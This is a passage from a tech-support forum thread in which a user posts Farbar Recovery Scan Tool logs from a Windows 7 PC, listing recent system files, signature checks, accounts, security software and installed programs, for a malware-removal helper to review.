2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:19 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2017-03-15 19:42 - 2017-02-09 12:19 - 03945192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2017-03-15 19:42 - 2017-02-09 12:16 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00481792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscms.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00215040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icm32.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:03 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2017-03-15 19:42 - 2017-02-09 12:03 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2017-03-15 19:42 - 2017-02-09 12:03 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2017-03-15 19:42 - 2017-02-09 12:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2017-03-15 19:42 - 2017-02-09 12:00 - 03220480 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-03-15 19:42 - 2017-02-09 11:59 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2017-03-15 19:42 - 2017-02-09 11:58 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2017-03-15 19:42 - 2017-02-09 11:55 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2017-03-15 19:42 - 2017-02-09 11:55 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2017-03-15 19:42 - 2017-02-09 11:55 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2017-03-15 19:42 - 2017-02-09 11:54 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2017-03-15 19:42 - 2017-02-09 11:54 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2017-03-15 19:42 - 2017-02-09 11:53 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2017-03-15 19:42 - 2017-02-09 11:51 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WcsPlugInService.dll
2017-03-15 19:42 - 2017-02-09 11:50 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2017-03-15 19:42 - 2017-02-09 11:50 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2017-03-15 19:42 - 2017-02-09 11:50 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2017-03-15 19:42 - 2017-02-09 11:50 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2017-03-15 19:42 - 2017-02-09 11:49 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2017-03-15 19:42 - 2017-02-09 11:49 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 11:49 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 11:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 11:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 10:06 - 01648128 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2017-03-15 19:42 - 2017-02-09 10:06 - 01180160 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2017-03-15 19:42 - 2017-02-06 12:14 - 00733696 _____ (Microsoft Corporation) C:\Windows\HelpPane.exe
2017-03-15 19:42 - 2017-01-13 14:00 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2017-03-15 19:42 - 2017-01-13 14:00 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2017-03-15 19:42 - 2017-01-13 13:45 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2017-03-15 19:42 - 2017-01-13 13:45 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2017-03-15 19:42 - 2017-01-11 14:01 - 01887744 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2017-03-15 19:42 - 2017-01-11 14:01 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
2017-03-15 19:42 - 2017-01-11 13:43 - 01241088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2017-03-15 19:42 - 2017-01-11 13:43 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3r.dll
2017-03-15 19:42 - 2017-01-06 14:00 - 01574912 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2017-03-15 19:42 - 2017-01-06 13:44 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2017-03-15 19:38 - 2017-02-22 19:42 - 00084712 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2017-03-15 19:38 - 2017-02-22 19:37 - 01285632 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2017-03-15 19:38 - 2017-02-18 10:05 - 01609216 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2017-03-15 19:38 - 2017-02-18 10:05 - 00646656 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2017-03-15 19:38 - 2016-12-31 11:36 - 00556544 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2017-03-15 19:38 - 2016-12-31 11:36 - 00335360 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2017-03-15 19:38 - 2016-12-31 11:36 - 00293376 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2017-03-15 19:38 - 2016-12-31 11:36 - 00233984 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2017-03-15 19:38 - 2016-12-31 11:36 - 00133632 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2017-03-15 06:10 - 2017-03-15 06:10 - 00003128 _____ C:\Windows\System32\Tasks\DRScanner Startup
2017-03-15 06:10 - 2017-03-15 06:10 - 00002038 _____ C:\Users\Public\Desktop\HouseCall for Home Networks.lnk
2017-03-15 06:10 - 2017-03-15 06:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HouseCall for Home Networks
2017-03-15 06:10 - 2017-03-15 06:10 - 00000000 ____D C:\Program Files\WinPcap
2017-03-14 15:49 - 2017-03-14 15:49 - 00000000 ____D C:\Windows\Trend Micro
2017-03-14 15:44 - 2017-03-14 15:44 - 02527376 _____ (Trend Micro Inc.) C:\Users\KEKLR\Downloads\HousecallLauncher64 (1).exe
2017-03-14 15:42 - 2017-03-14 15:42 - 02527376 _____ (Trend Micro Inc.) C:\Users\KEKLR\Downloads\HousecallLauncher64.exe
2017-03-14 14:53 - 2017-03-14 14:53 - 00073600 _____ C:\Users\KEKLR\Documents\Oklahoma’s Deadliest Tornado-3.pdf
2017-03-14 14:17 - 2017-03-14 14:18 - 00073594 _____ C:\Users\KEKLR\Downloads\Oklahoma’s Deadliest Tornado.pdf
2017-03-14 14:07 - 2017-04-11 17:34 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-03-14 14:07 - 2017-03-14 14:07 - 00002047 _____ C:\Users\Public\Desktop\Acrobat Reader DC.lnk
2017-03-14 13:49 - 2017-03-14 13:49 - 01204344 _____ (Adobe Systems Incorporated) C:\Users\KEKLR\Downloads\readerdc_en_xa_install.exe
2017-03-12 19:38 - 2017-03-12 19:39 - 02822778 _____ C:\Users\KEKLR\Downloads\Attachments_2017312.zip

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-11 17:36 - 2015-05-13 20:23 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2017-04-11 17:30 - 2016-10-16 19:56 - 00000911 _____ C:\Windows\Tasks\EPSON WF-3620 Series Update {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D}.job
2017-04-11 17:30 - 2016-10-16 19:56 - 00000725 _____ C:\Windows\Tasks\EPSON WF-3620 Series Invitation {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D}.job
2017-04-11 06:56 - 2009-07-14 01:32 - 00000000 ____D C:\Windows\system32\FxsTmp
2017-04-11 06:51 - 2009-07-14 00:45 - 00026192 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-04-11 06:51 - 2009-07-14 00:45 - 00026192 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-04-11 06:46 - 2014-05-16 06:41 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-04-11 06:45 - 2014-05-16 06:41 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2017-04-10 20:57 - 2010-01-02 05:15 - 00001042 _____ C:\Users\KEKLR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2017-04-10 18:01 - 2017-01-31 19:16 - 00003186 _____ C:\Windows\System32\Tasks\HPCeeScheduleForKEKLR


Edited by krtate, 11 April 2017 - 04:55 PM.


#26 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 11 April 2017 - 04:51 PM

2017-04-10 18:01 - 2017-01-31 19:16 - 00000332 _____ C:\Windows\Tasks\HPCeeScheduleForKEKLR.job
2017-04-09 19:52 - 2010-01-02 05:15 - 00000186 _____ C:\ProgramData\HPWALog.txt
2017-04-09 19:49 - 2009-07-14 01:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-09 18:07 - 2009-07-14 01:13 - 00788704 _____ C:\Windows\system32\PerfStringBackup.INI
2017-04-09 18:07 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\inf
2017-04-09 17:56 - 2010-03-18 13:26 - 00000000 ____D C:\Users\KEKLR\AppData\LocalLow\Temp
2017-04-09 08:10 - 2010-10-16 09:21 - 00000000 ____D C:\Program Files (x86)\Coupons
2017-04-08 17:28 - 2011-12-25 21:27 - 08905685 _____ C:\Users\KEKLR\AppData\Local\census.cache
2017-04-08 17:25 - 2011-12-25 21:27 - 00126206 _____ C:\Users\KEKLR\AppData\Local\ars.cache
2017-04-08 15:25 - 2012-02-03 08:53 - 00002127 _____ C:\Windows\epplauncher.mif
2017-04-08 15:09 - 2011-02-27 20:01 - 00000000 ____D C:\ProgramData\F-Secure
2017-04-08 13:51 - 2016-11-24 19:27 - 00000000 ____D C:\Users\KEKLR\AppData\LocalLow\Mozilla
2017-04-08 13:20 - 2015-04-25 11:35 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-04-08 13:13 - 2009-08-09 03:51 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2017-04-08 12:45 - 2010-03-09 18:28 - 00000000 ____D C:\Users\KEKLR\Documents\Mitchell Family 2009
2017-04-08 12:39 - 2010-01-19 08:35 - 00000000 ____D C:\Program Files (x86)\Trend Micro
2017-04-08 10:52 - 2012-08-13 00:24 - 00002195 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-04-08 10:51 - 2012-08-13 00:24 - 00002183 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-04-07 18:06 - 2010-01-02 05:19 - 00532136 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2017-04-03 21:39 - 2011-01-13 09:53 - 00000000 ____D C:\Users\KEKLR\Documents\Moms cards sayings
2017-04-02 19:19 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\rescache
2017-04-02 18:18 - 2016-11-23 10:58 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-04-02 18:18 - 2012-04-30 06:20 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-03-22 06:47 - 2016-06-08 18:17 - 00000000 ____D C:\Users\KEKLR\Documents\DigiStamps
2017-03-19 20:14 - 2009-07-14 00:45 - 00464288 _____ C:\Windows\system32\FNTCACHE.DAT
2017-03-19 20:13 - 2015-02-20 18:53 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2017-03-19 20:13 - 2015-02-20 18:53 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2017-03-19 20:10 - 2014-12-10 15:46 - 00000000 ____D C:\Windows\system32\appraiser
2017-03-19 20:10 - 2014-05-06 13:32 - 00000000 ___SD C:\Windows\system32\CompatTel
2017-03-19 20:10 - 2009-07-14 01:32 - 00000000 ____D C:\Program Files\DVD Maker
2017-03-19 19:45 - 2013-07-27 22:12 - 00000000 ____D C:\Windows\system32\MRT
2017-03-17 06:39 - 2010-01-03 15:16 - 138634176 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-03-17 06:32 - 2015-02-20 18:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2017-03-14 14:50 - 2015-07-10 05:57 - 02244280 _____ C:\Users\KEKLR\Documents\AdobeAcroCleaner_DC2015.exe
2017-03-14 14:09 - 2014-08-22 07:59 - 00000000 ____D C:\Users\KEKLR\AppData\Local\Adobe
2017-03-14 12:31 - 2014-05-22 19:38 - 00000000 ____D C:\Users\KEKLR\Documents\Taylor Tax
2017-03-14 08:46 - 2012-03-29 09:12 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-03-14 08:46 - 2012-03-29 09:12 - 00004312 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-03-14 08:46 - 2011-05-19 12:44 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-03-14 08:45 - 2012-01-05 06:12 - 00000000 ____D C:\Windows\system32\Macromed
2017-03-14 08:45 - 2009-08-09 03:40 - 00000000 ____D C:\Windows\SysWOW64\Macromed

==================== Files in the root of some directories =======

2014-11-13 10:45 - 2014-11-13 10:45 - 6000640 _____ () C:\Program Files (x86)\GUTAF36.tmp
2011-03-24 19:07 - 2011-06-12 16:08 - 0001854 _____ () C:\Users\KEKLR\AppData\Roaming\GhostObjGAFix.xml
2010-01-13 12:03 - 2013-08-26 15:30 - 0001356 _____ () C:\Users\KEKLR\AppData\Roaming\wklnhst.dat
2011-12-25 21:27 - 2017-04-08 17:25 - 0126206 _____ () C:\Users\KEKLR\AppData\Local\ars.cache
2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\AtStart.txt
2011-12-25 21:27 - 2017-04-08 17:28 - 8905685 _____ () C:\Users\KEKLR\AppData\Local\census.cache
2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\DSwitch.txt
2010-05-03 10:28 - 2010-05-03 10:28 - 0000036 _____ () C:\Users\KEKLR\AppData\Local\housecall.guid.cache
2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\QSwitch.txt
2012-01-05 08:43 - 2012-01-05 09:26 - 0007598 _____ () C:\Users\KEKLR\AppData\Local\Resmon.ResmonCfg
2014-05-03 11:58 - 2014-05-03 11:58 - 0000010 _____ () C:\Users\KEKLR\AppData\Local\sponge.last.runtime.cache
2011-01-25 22:09 - 2011-01-25 22:09 - 0152028 _____ () C:\Users\KEKLR\AppData\Local\tmpIZZY%20ON%20TRAMPOLINE[1].0
2011-01-25 22:09 - 2011-01-25 22:09 - 0175047 _____ () C:\Users\KEKLR\AppData\Local\tmpIZZY%20ON%20TRAMPOLINE[1].JPG
2017-04-08 15:18 - 2017-04-08 15:18 - 0047906 _____ () C:\ProgramData\agent.1491679133.bdinstall.bin
2017-04-08 15:27 - 2017-04-08 15:27 - 0028972 _____ () C:\ProgramData\agent.1491679676.bdinstall.bin
2017-04-08 15:31 - 2017-04-08 15:31 - 0028766 _____ () C:\ProgramData\agent.1491679893.bdinstall.bin
2017-04-08 16:52 - 2017-04-08 16:52 - 0029153 _____ () C:\ProgramData\agent.1491684753.bdinstall.bin
2013-09-01 17:00 - 2013-09-01 17:00 - 0000057 _____ () C:\ProgramData\Ament.ini
2010-01-02 05:15 - 2017-04-09 19:52 - 0000186 _____ () C:\ProgramData\HPWALog.txt
2010-01-13 10:46 - 2016-11-23 07:48 - 0006069 _____ () C:\ProgramData\hpzinstall.log

Some files in TEMP:
====================
2017-04-09 18:57 - 2017-02-09 12:33 - 1732864 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\dllnt_dump.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-04-09 09:44

==================== End of FRST.txt ============================



#27 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 11 April 2017 - 04:56 PM

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 15-03-2017
Ran by KEKLR (11-04-2017 17:42:33)
Running from C:\Users\KEKLR\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2010-01-02 09:06:14)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-3698744866-2675293530-421701469-500 - Administrator - Disabled)
Guest (S-1-5-21-3698744866-2675293530-421701469-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3698744866-2675293530-421701469-1002 - Limited - Enabled)
KEKLR (S-1-5-21-3698744866-2675293530-421701469-1001 - Administrator - Enabled) => C:\Users\KEKLR

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189}
AS: Microsoft Security Essentials (Enabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (Version: 6.2.1 - Hewlett-Packard) Hidden
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Activate Norton Online Backup (HKLM-x32\...\{C57BCDE1-7CB9-467D-B3BA-7E119916CDC1}) (Version: 1.1.20.0 - Symantec)
Administrative Medical Assisting, 6th Edition (HKLM-x32\...\Administrative Medical Assisting_is1) (Version:  - Cengage Learning)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.3.9130 - Adobe Systems Inc.)
Adobe Flash Player 25 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 25.0.0.127 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.127 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.5 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.5.9.620 - Adobe Systems, Inc.)
Amazon Kindle (HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Amazon Kindle) (Version:  - Amazon)
Bible Data Type System Files (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
Camera Window DS (x32 Version: 5.2 - Canon) Hidden
Camera Window DVC (x32 Version: 5.4 - Canon) Hidden
Camera Window MC (x32 Version: 5.4 - Canon) Hidden
Canon Camera Window DC_DV 5 for ZoomBrowser EX (HKLM-x32\...\InstallShield_{001AB29C-5468-4972-8D24-2EBDB2B12133}) (Version: 5.4 - Canon)
Canon Camera Window DS for ZoomBrowser EX (HKLM-x32\...\InstallShield_{6B8BDABA-6737-4998-AEE4-E218EDE5FC7A}) (Version: 5.2 - Canon)
Canon Camera Window MC 5 for ZoomBrowser EX (HKLM-x32\...\InstallShield_{89EB3ED7-225A-412E-B048-623D502C000F}) (Version: 5.4 - Canon)
